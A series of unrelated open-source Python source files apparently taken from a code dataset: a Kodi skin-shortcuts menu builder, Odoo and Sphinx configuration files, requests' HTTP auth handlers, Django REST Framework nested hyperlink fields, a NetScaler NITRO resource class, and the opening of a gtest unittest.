additionalproperty = xmltree.SubElement( newelement, "property" )
additionalproperty.set( "name", property[0].decode( "utf-8" ) )
additionalproperty.text = property[1]
allProps[ property[ 0 ] ] = additionalproperty
# If this is a widget or background, set a skin setting to say it's enabled
if property[0] == "widget":
xbmc.executebuiltin( "Skin.SetBool(skinshortcuts-widget-" + property[1] + ")" )
# And if it's the main menu, list it
if groupName == "mainmenu":
xbmc.executebuiltin( "Skin.SetString(skinshortcuts-widget-" + str( self.widgetCount ) + "," + property[ 1 ] + ")" )
self.widgetCount += 1
elif property[0] == "background":
try:
xbmc.executebuiltin( "Skin.SetBool(skinshortcuts-background-" + property[1] + ")" )
except UnicodeEncodeError:
xbmc.executebuiltin( "Skin.SetBool(skinshortcuts-background-" + property[1].encode('utf-8') + ")" )
# If this is the main menu, and we're cloning widgets, backgrounds or properties...
if groupName == "mainmenu":
if "clonewidgets" in options:
widgetProperties = [ "widget", "widgetName", "widgetType", "widgetTarget", "widgetPath", "widgetPlaylist" ]
if property[0] in widgetProperties:
self.MAINWIDGET[ property[0] ] = property[1]
if "clonebackgrounds" in options:
backgroundProperties = [ "background", "backgroundName", "backgroundPlaylist", "backgroundPlaylistName" ]
if property[0] in backgroundProperties:
self.MAINBACKGROUND[ property[0] ] = property[1]
if "cloneproperties" in options:
self.MAINPROPERTIES[ property[0] ] = property[1]
# For backwards compatibility, save widgetPlaylist as widgetPath too
if property[ 0 ] == "widgetPlaylist":
additionalproperty = xmltree.SubElement( newelement, "property" )
additionalproperty.set( "name", "widgetPath" )
additionalproperty.text = try_decode( property[1] )
# Get fallback properties, property requirements, templateOnly value of properties
fallbackProperties, fallbacks = DATA._getCustomPropertyFallbacks( groupName )
# Add fallback properties
for key in fallbackProperties:
if key not in allProps.keys():
# Check whether we have a fallback for the value
for propertyMatch in fallbacks[ key ]:
matches = False
if propertyMatch[ 1 ] is None:
# This has no conditions, so it matched
matches = True
else:
# This has an attribute and a value to match against
for property in properties:
if property[ 0 ] == propertyMatch[ 1 ] and property[ 1 ] == propertyMatch[ 2 ]:
matches = True
break
if matches:
additionalproperty = xmltree.SubElement( newelement, "property" )
additionalproperty.set( "name", key.decode( "utf-8" ) )
additionalproperty.text = propertyMatch[ 0 ]
allProps[ key ] = additionalproperty
break
# Get property requirements
otherProperties, requires, templateOnly = DATA._getPropertyRequires()
# Remove any properties whose requirements haven't been met
for key in otherProperties:
if key in allProps.keys() and key in requires.keys() and requires[ key ] not in allProps.keys():
# This properties requirements aren't met
newelement.remove( allProps[ key ] )
allProps.pop( key )
# Primary visibility
visibility = item.find( "visibility" )
if visibility is not None:
xmltree.SubElement( newelement, "visible" ).text = visibility.text
#additional onclick (group overrides)
onclicks = item.findall( "additional-action" )
for onclick in onclicks:
onclickelement = xmltree.SubElement( newelement, "onclick" )
onclickelement.text = onclick.text
if "condition" in onclick.attrib:
onclickelement.set( "condition", onclick.attrib.get( "condition" ) )
# Onclick
onclicks = item.findall( "override-action" )
if len( onclicks ) == 0:
onclicks = item.findall( "action" )
for onclick in onclicks:
onclickelement = xmltree.SubElement( newelement, "onclick" )
# Upgrade action if necessary
onclick.text = DATA.upgradeAction( onclick.text )
# PVR Action
if onclick.text.startswith( "pvr-channel://" ):
# PVR action
onclickelement.text = "RunScript(script.skinshortcuts,type=launchpvr&channel=" + onclick.text.replace( "pvr-channel://", "" ) + ")"
elif onclick.text.startswith( "ActivateWindow(" ) and xbmc.translatePath( "special://skin/" ) in onclick.text:
# Skin-relative links
try:
actionParts = onclick.text[15:-1].split( "," )
actionParts[1] = actionParts[1].replace( xbmc.translatePath( "special://skin/" ), "" )
path = actionParts[1].split( os.sep )
newAction = "special://skin"
for actionPart in actionParts[1].split( os.sep ):
if actionPart != "":
newAction = newAction + "/" + actionPart
if len( actionParts ) == 2:
onclickelement.text = "ActivateWindow(" + actionParts[0] + "," + newAction + ")"
else:
onclickelement.text = "ActivateWindow(" + actionParts[0] + "," + newAction + "," + actionParts[2] + ")"
except:
pass
else:
onclickelement.text = onclick.text
# Also add it as a path property
if not self.propertyExists( "path", newelement ) and not "path" in allProps.keys():
# we only add the path property if there isn't already one in the list because it has to be unique in Kodi lists
pathelement = xmltree.SubElement( newelement, "property" )
pathelement.set( "name", "path" )
pathelement.text = onclickelement.text
allProps[ "path" ] = pathelement
# Get 'list' property (the action property of an ActivateWindow shortcut)
if not self.propertyExists( "list", newelement ) and not "list" in allProps.keys():
# we only add the list property if there isn't already one in the list because it has to be unique in Kodi lists
listElement = xmltree.SubElement( newelement, "property" )
listElement.set( "name", "list" )
listElement.text = DATA.getListProperty( onclickelement.text.replace('"','') )
allProps[ "list" ] = listElement
if onclick.text == "ActivateWindow(Settings)":
self.hasSettings = True
if "condition" in onclick.attrib:
onclickelement.set( "condition", onclick.attrib.get( "condition" ) )
if len( self.checkForShortcuts ) != 0:
# Check if we've been asked to watch for this shortcut
newCheckForShortcuts = []
for checkforShortcut in self.checkForShortcuts:
if onclick.text.lower() == checkforShortcut[ 0 ]:
# They match, change the value to True
newCheckForShortcuts.append( ( checkforShortcut[ 0 ], checkforShortcut[ 1 ], "True" ) )
else:
newCheckForShortcuts.append( checkforShortcut )
self.checkForShortcuts = newCheckForShortcuts
# Visibility
if visibilityCondition is not None:
visibilityElement = xmltree.SubElement( newelement, "visible" )
if profileVisibility is not None:
visibilityElement.text = profileVisibility + " + [" + visibilityCondition + "]"
else:
visibilityElement.text = visibilityCondition
issubmenuElement = xmltree.SubElement( newelement, "property" )
issubmenuElement.set( "name", "isSubmenu" )
issubmenuElement.text = "True"
allProps[ "isSubmenu" ] = issubmenuElement
elif profileVisibility is not None:
visibilityElement = xmltree.SubElement( newelement, "visible" )
visibilityElement.text = profileVisibility
# Submenu visibility
if submenuVisibility is not None:
submenuVisibilityElement = xmltree.SubElement( newelement, "property" )
submenuVisibilityElement.set( "name", "submenuVisibility" )
if submenuVisibility.isdigit():
submenuVisibilityElement.text = "$NUMBER[" + submenuVisibility + "]"
else:
submenuVisibilityElement.text = DATA.slugify( submenuVisibility )
# Group name
group = xmltree.SubElement( newelement, "property" )
group.set( "name", "group" )
group.text = try_decode( groupName )
allProps[ "group" ] = group
# If this isn't the main menu, and we're cloning widgets or backgrounds...
if groupName != "mainmenu":
if "clonewidgets" in options and len( self.MAINWIDGET ) is not 0:
for key in self.MAINWIDGET:
additionalproperty = xmltree.SubElement( newelement, "property" )
additionalproperty.set( "name", key )
additionalproperty.text = try_decode( self.MAINWIDGET[ key ] )
allProps[ key ] = additionalproperty
if "clonebackgrounds" in options and len( self.MAINBACKGROUND ) is not 0:
for key in self.MAINBACKGROUND:
additionalproperty = xmltree.SubElement( newelement, "property" )
additionalproperty.set( "name", key )
additionalproperty.text = DATA.local( self.MAINBACKGROUND[ key ] )[1]
allProps[ key ] = additionalproperty
if "cloneproperties" in options and len( self.MAINPROPERTIES ) is not 0:
for key in self.MAINPROPERTIES:
additionalproperty = xmltree.SubElement( newelement, "property" )
additionalproperty.set( "name", key )
additionalproperty.text = DATA.local( self.MAINPROPERTIES[ key ] )[1]
allProps[ key ] = additionalproperty
propertyPatterns = self.getPropertyPatterns(labelID.text, groupName)
if len(propertyPatterns) > 0:
propertyReplacements = self.getPropertyReplacements(newelement)
for propertyName in propertyPatterns:
propertyPattern = propertyPatterns[propertyName][0]
for original, replacement in propertyReplacements:
regexpPattern = re.compile(re.escape(original), re.IGNORECASE)
propertyPattern = regexpPattern.sub(replacement, propertyPattern)
additionalproperty = xmltree.SubElement(newelement, "property")
additionalproperty.set("name", propertyName.decode("utf-8"))
additionalproperty.text = propertyPattern.decode("utf-8")
allProps[ propertyName ] = additionalproperty
return( newelement, allProps )
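# Look up any propertypattern overrides the skin defines for this group,
# keyed by property name; patterns tied to a specific labelID take priority
# over group-wide ones.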
def getPropertyPatterns(self, labelID, group):
propertyPatterns = {}
if not self.loadedPropertyPatterns:
overrides = DATA._get_overrides_skin()
self.propertyPatterns = overrides.getroot().findall("propertypattern")
self.loadedPropertyPatterns = True
for propertyPatternElement in self.propertyPatterns:
propertyName = propertyPatternElement.get("property")
propertyGroup = propertyPatternElement.get("group")
if not propertyName or not propertyGroup or propertyGroup != group or not propertyPatternElement.text:
continue
propertyLabelID = propertyPatternElement.get("labelID")
if not propertyLabelID:
if propertyName not in propertyPatterns:
propertyPatterns[propertyName] = [propertyPatternElement.text, False]
elif propertyLabelID == labelID:
if propertyName not in propertyPatterns or not propertyPatterns[propertyName][1]:
propertyPatterns[propertyName] = [propertyPatternElement.text, True]
return propertyPatterns
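# Collect ::NAME:: replacement pairs from the element's existing properties
# and child tags, used when expanding property patterns.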
def getPropertyReplacements(self, element):
propertyReplacements = []
for subElement in list(element):
if subElement.tag == "property":
propertyName = subElement.get("name")
if propertyName and subElement.text:
propertyReplacements.append(("::%s::" % propertyName, subElement.text))
elif subElement.text:
propertyReplacements.append(("::%s::" % subElement.tag, subElement.text))
return propertyReplacements
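# Check whether the element already has a <property> child carrying
# propertyName as an attribute key.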
def propertyExists( self, propertyName, element ):
for item in element.findall( "property" ):
if propertyName in item.attrib:
return True
return False
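# Return the index of item within list, or None if it isn't present.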
def findIncludePosition( self, list, item ):
try:
return list.index( item )
except:
return None
| gpl-2.0 |
rotofly/odoo | addons/sale_order_dates/__init__.py | 441 | 1071 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import sale_order_dates
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
vsdev1/testacular | docs/conf.py | 20 | 7855 | # -*- coding: utf-8 -*-
#
# testacular documentation build configuration file, created by
# sphinx-quickstart on Mon Oct 8 07:33:53 2012.
#
# This file is execfile()d with the current directory set to its containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys, os
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# -- General configuration -----------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.todo']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'Testacular'
copyright = u'2012, Vojita Jina'
# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# The short X.Y version.
version = '0.5'
# The full version, including alpha/beta/rc tags.
release = '0.5.4'
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# -- Options for HTML output ---------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
sys.path.append(os.path.abspath('_themes'))
html_theme_path = ['_themes']
html_theme = 'bootstrap'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
html_short_title = 'Testacular Docs'
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'testaculardoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'testacular.tex', u'testacular Documentation',
u'Vojita Jina', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'testacular', u'testacular Documentation',
[u'Vojita Jina'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'testacular', u'testacular Documentation',
u'Vojita Jina', 'testacular', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
| mit |
akashsinghal/Speech-Memorization-App | speech/Swift/Speech-gRPC-Streaming/env/lib/python3.6/site-packages/pip/_vendor/requests/auth.py | 355 | 8175 | # -*- coding: utf-8 -*-
"""
requests.auth
~~~~~~~~~~~~~
This module contains the authentication handlers for Requests.
"""
import os
import re
import time
import hashlib
import threading
from base64 import b64encode
from .compat import urlparse, str
from .cookies import extract_cookies_to_jar
from .utils import parse_dict_header, to_native_string
from .status_codes import codes
CONTENT_TYPE_FORM_URLENCODED = 'application/x-www-form-urlencoded'
CONTENT_TYPE_MULTI_PART = 'multipart/form-data'
def _basic_auth_str(username, password):
"""Returns a Basic Auth string."""
authstr = 'Basic ' + to_native_string(
b64encode(('%s:%s' % (username, password)).encode('latin1')).strip()
)
return authstr
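# For reference, a minimal sketch of the expected result:
# _basic_auth_str('user', 'pass') -> 'Basic dXNlcjpwYXNz'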
class AuthBase(object):
"""Base class that all auth implementations derive from"""
def __call__(self, r):
raise NotImplementedError('Auth hooks must be callable.')
class HTTPBasicAuth(AuthBase):
"""Attaches HTTP Basic Authentication to the given Request object."""
def __init__(self, username, password):
self.username = username
self.password = password
def __eq__(self, other):
return all([
self.username == getattr(other, 'username', None),
self.password == getattr(other, 'password', None)
])
def __ne__(self, other):
return not self == other
def __call__(self, r):
r.headers['Authorization'] = _basic_auth_str(self.username, self.password)
return r
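# A usage sketch (the URL below is a placeholder):
# import requests
# requests.get('https://api.example.com/user', auth=HTTPBasicAuth('user', 'pass'))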
class HTTPProxyAuth(HTTPBasicAuth):
"""Attaches HTTP Proxy Authentication to a given Request object."""
def __call__(self, r):
r.headers['Proxy-Authorization'] = _basic_auth_str(self.username, self.password)
return r
class HTTPDigestAuth(AuthBase):
"""Attaches HTTP Digest Authentication to the given Request object."""
def __init__(self, username, password):
self.username = username
self.password = password
# Keep state in per-thread local storage
self._thread_local = threading.local()
def init_per_thread_state(self):
# Ensure state is initialized just once per-thread
if not hasattr(self._thread_local, 'init'):
self._thread_local.init = True
self._thread_local.last_nonce = ''
self._thread_local.nonce_count = 0
self._thread_local.chal = {}
self._thread_local.pos = None
self._thread_local.num_401_calls = None
def build_digest_header(self, method, url):
"""
:rtype: str
"""
realm = self._thread_local.chal['realm']
nonce = self._thread_local.chal['nonce']
qop = self._thread_local.chal.get('qop')
algorithm = self._thread_local.chal.get('algorithm')
opaque = self._thread_local.chal.get('opaque')
hash_utf8 = None
if algorithm is None:
_algorithm = 'MD5'
else:
_algorithm = algorithm.upper()
# lambdas assume digest modules are imported at the top level
if _algorithm == 'MD5' or _algorithm == 'MD5-SESS':
def md5_utf8(x):
if isinstance(x, str):
x = x.encode('utf-8')
return hashlib.md5(x).hexdigest()
hash_utf8 = md5_utf8
elif _algorithm == 'SHA':
def sha_utf8(x):
if isinstance(x, str):
x = x.encode('utf-8')
return hashlib.sha1(x).hexdigest()
hash_utf8 = sha_utf8
KD = lambda s, d: hash_utf8("%s:%s" % (s, d))
if hash_utf8 is None:
return None
# XXX not implemented yet
entdig = None
p_parsed = urlparse(url)
#: path is request-uri defined in RFC 2616 which should not be empty
path = p_parsed.path or "/"
if p_parsed.query:
path += '?' + p_parsed.query
A1 = '%s:%s:%s' % (self.username, realm, self.password)
A2 = '%s:%s' % (method, path)
HA1 = hash_utf8(A1)
HA2 = hash_utf8(A2)
if nonce == self._thread_local.last_nonce:
self._thread_local.nonce_count += 1
else:
self._thread_local.nonce_count = 1
ncvalue = '%08x' % self._thread_local.nonce_count
s = str(self._thread_local.nonce_count).encode('utf-8')
s += nonce.encode('utf-8')
s += time.ctime().encode('utf-8')
s += os.urandom(8)
cnonce = (hashlib.sha1(s).hexdigest()[:16])
if _algorithm == 'MD5-SESS':
HA1 = hash_utf8('%s:%s:%s' % (HA1, nonce, cnonce))
if not qop:
respdig = KD(HA1, "%s:%s" % (nonce, HA2))
elif qop == 'auth' or 'auth' in qop.split(','):
noncebit = "%s:%s:%s:%s:%s" % (
nonce, ncvalue, cnonce, 'auth', HA2
)
respdig = KD(HA1, noncebit)
else:
# XXX handle auth-int.
return None
self._thread_local.last_nonce = nonce
# XXX should the partial digests be encoded too?
base = 'username="%s", realm="%s", nonce="%s", uri="%s", ' \
'response="%s"' % (self.username, realm, nonce, path, respdig)
if opaque:
base += ', opaque="%s"' % opaque
if algorithm:
base += ', algorithm="%s"' % algorithm
if entdig:
base += ', digest="%s"' % entdig
if qop:
base += ', qop="auth", nc=%s, cnonce="%s"' % (ncvalue, cnonce)
return 'Digest %s' % (base)
def handle_redirect(self, r, **kwargs):
"""Reset num_401_calls counter on redirects."""
if r.is_redirect:
self._thread_local.num_401_calls = 1
def handle_401(self, r, **kwargs):
"""
Takes the given response and tries digest-auth, if needed.
:rtype: requests.Response
"""
if self._thread_local.pos is not None:
# Rewind the file position indicator of the body to where
# it was to resend the request.
r.request.body.seek(self._thread_local.pos)
s_auth = r.headers.get('www-authenticate', '')
if 'digest' in s_auth.lower() and self._thread_local.num_401_calls < 2:
self._thread_local.num_401_calls += 1
pat = re.compile(r'digest ', flags=re.IGNORECASE)
self._thread_local.chal = parse_dict_header(pat.sub('', s_auth, count=1))
# Consume content and release the original connection
# to allow our new request to reuse the same one.
r.content
r.close()
prep = r.request.copy()
extract_cookies_to_jar(prep._cookies, r.request, r.raw)
prep.prepare_cookies(prep._cookies)
prep.headers['Authorization'] = self.build_digest_header(
prep.method, prep.url)
_r = r.connection.send(prep, **kwargs)
_r.history.append(r)
_r.request = prep
return _r
self._thread_local.num_401_calls = 1
return r
def __call__(self, r):
# Initialize per-thread state, if needed
self.init_per_thread_state()
# If we have a saved nonce, skip the 401
if self._thread_local.last_nonce:
r.headers['Authorization'] = self.build_digest_header(r.method, r.url)
try:
self._thread_local.pos = r.body.tell()
except AttributeError:
# In the case of HTTPDigestAuth being reused and the body of
# the previous request was a file-like object, pos has the
# file position of the previous body. Ensure it's set to
# None.
self._thread_local.pos = None
r.register_hook('response', self.handle_401)
r.register_hook('response', self.handle_redirect)
self._thread_local.num_401_calls = 1
return r
def __eq__(self, other):
return all([
self.username == getattr(other, 'username', None),
self.password == getattr(other, 'password', None)
])
def __ne__(self, other):
return not self == other
| apache-2.0 |
iw3hxn/LibrERP | crm_lead_correct/__init__.py | 1 | 1436 | # -*- encoding: utf-8 -*-
##############################################################################
#
# Copyright (c) 2013 Didotech SRL (info at didotech.com)
# All Rights Reserved.
#
# WARNING: This program as such is intended to be used by professional
# programmers who take the whole responsability of assessing all potential
# consequences resulting from its eventual inadequacies and bugs
# End users who are looking for a ready-to-use solution with commercial
# garantees and support are strongly adviced to contract a Free Software
# Service Company
#
# This program is Free Software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
##############################################################################
from . import models
from . import report
from . import wizard
| agpl-3.0 |
elberthcabrales/ava | rest_extensions/relations.py | 2 | 1956 | from operator import attrgetter
from rest_framework.reverse import reverse
from rest_framework import serializers
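# Hyperlinked fields for nested routes: besides the usual lookup field, extra
# URL kwargs are resolved from attributes of the object being serialized.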
class HyperlinkedNestedIdentityField(serializers.HyperlinkedIdentityField):
def __init__(self, view_name=None, additional_reverse_kwargs={}, **kwargs):
self.additional_reverse_kwargs = additional_reverse_kwargs
super(HyperlinkedNestedIdentityField, self).__init__(view_name, **kwargs)
def get_url(self, obj, view_name, request, format):
if obj.pk is None:
return None
kwargs = {}
for key, value in self.additional_reverse_kwargs.items():
kwargs[key] = getattr(obj, value, value)
kwargs.update({self.lookup_url_kwarg: getattr(obj, self.lookup_field)})
return self.reverse(view_name, kwargs=kwargs, request=request, format=format)
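# A usage sketch (view name and kwargs are hypothetical):
# url = HyperlinkedNestedIdentityField(
#     view_name='project-task-detail',
#     additional_reverse_kwargs={'project_pk': 'project_id'})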
class HyperlinkedNestedRelatedField(serializers.HyperlinkedRelatedField):
def __init__(self, view_name=None, additional_reverse_kwargs={}, **kwargs):
self.additional_reverse_kwargs = additional_reverse_kwargs
super(HyperlinkedNestedRelatedField, self).__init__(view_name, **kwargs)
def to_representation(self, value):
request = self.context.get('request', None)
format = self.context.get('format', None)
return self.get_url(value, self.view_name, request, format)
def get_url(self, obj, view_name, request, format):
"""
Given an object, return the URL that hyperlinks to the object.
May raise a `NoReverseMatch` if the `view_name` and `lookup_field`
attributes are not configured to correctly match the URL conf.
"""
kwargs = {}
for key, value in self.additional_reverse_kwargs.items():
kwargs[key] = getattr(obj, value, None)
kwargs.update({self.lookup_url_kwarg: attrgetter(self.lookup_field)(obj)})
return self.reverse(view_name, kwargs=kwargs, request=request, format=format)
| gpl-3.0 |
benfinke/ns_python | build/lib/nssrc/com/citrix/netscaler/nitro/resource/config/filter/filterprebodyinjection.py | 3 | 4016 | #
# Copyright (c) 2008-2015 Citrix Systems, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License")
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_resource
from nssrc.com.citrix.netscaler.nitro.resource.base.base_resource import base_response
from nssrc.com.citrix.netscaler.nitro.service.options import options
from nssrc.com.citrix.netscaler.nitro.exception.nitro_exception import nitro_exception
from nssrc.com.citrix.netscaler.nitro.util.nitro_util import nitro_util
class filterprebodyinjection(base_resource) :
""" Configuration for HTML Injection prebody resource. """
def __init__(self) :
self._prebody = ""
self._systemiid = ""
@property
def prebody(self) :
ur"""Name of file whose contents are to be inserted before the response body.<br/>Minimum length = 1.
"""
try :
return self._prebody
except Exception as e:
raise e
@prebody.setter
def prebody(self, prebody) :
ur"""Name of file whose contents are to be inserted before the response body.<br/>Minimum length = 1
"""
try :
self._prebody = prebody
except Exception as e:
raise e
@property
def systemiid(self) :
ur"""The system IID of the current NetScaler system.
"""
try :
return self._systemiid
except Exception as e:
raise e
def _get_nitro_response(self, service, response) :
ur""" converts nitro response into object and returns the object array in case of get request.
"""
try :
result = service.payload_formatter.string_to_resource(filterprebodyinjection_response, response, self.__class__.__name__)
if(result.errorcode != 0) :
if (result.errorcode == 444) :
service.clear_session(self)
if result.severity :
if (result.severity == "ERROR") :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
else :
raise nitro_exception(result.errorcode, str(result.message), str(result.severity))
return result.filterprebodyinjection
except Exception as e :
raise e
def _get_object_name(self) :
ur""" Returns the value of object identifier argument
"""
try :
return 0
except Exception as e :
raise e
@classmethod
def update(cls, client, resource) :
ur""" Use this API to update filterprebodyinjection.
"""
try :
if type(resource) is not list :
updateresource = filterprebodyinjection()
updateresource.prebody = resource.prebody
return updateresource.update_resource(client)
except Exception as e :
raise e
@classmethod
def unset(cls, client, resource, args) :
ur""" Use this API to unset the properties of filterprebodyinjection resource.
Properties that need to be unset are specified in args array.
"""
try :
if type(resource) is not list :
unsetresource = filterprebodyinjection()
return unsetresource.unset_resource(client, args)
except Exception as e :
raise e
@classmethod
def get(cls, client, name="", option_="") :
ur""" Use this API to fetch all the filterprebodyinjection resources that are configured on netscaler.
"""
try :
if not name :
obj = filterprebodyinjection()
response = obj.get_resources(client, option_)
return response
except Exception as e :
raise e
class filterprebodyinjection_response(base_response) :
def __init__(self, length=1) :
self.filterprebodyinjection = []
self.errorcode = 0
self.message = ""
self.severity = ""
self.sessionid = ""
self.filterprebodyinjection = [filterprebodyinjection() for _ in range(length)]
| apache-2.0 |
cs-au-dk/Artemis | WebKit/Source/ThirdParty/gtest/test/gtest_list_tests_unittest.py | 1068 | 5415 | #!/usr/bin/env python
#
# Copyright 2006, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Unit test for Google Test's --gtest_list_tests flag.
A user can ask Google Test to list all tests by specifying the
--gtest_list_tests flag. This script tests such functionality
by invoking gtest_list_tests_unittest_ (a program written with
Google Test) with the command line flags.
"""
__author__ = 'phanna@google.com (Patrick Hanna)'
import gtest_test_utils
# Constants.
# The command line flag for enabling/disabling listing all tests.
LIST_TESTS_FLAG = 'gtest_list_tests'
# Path to the gtest_list_tests_unittest_ program.
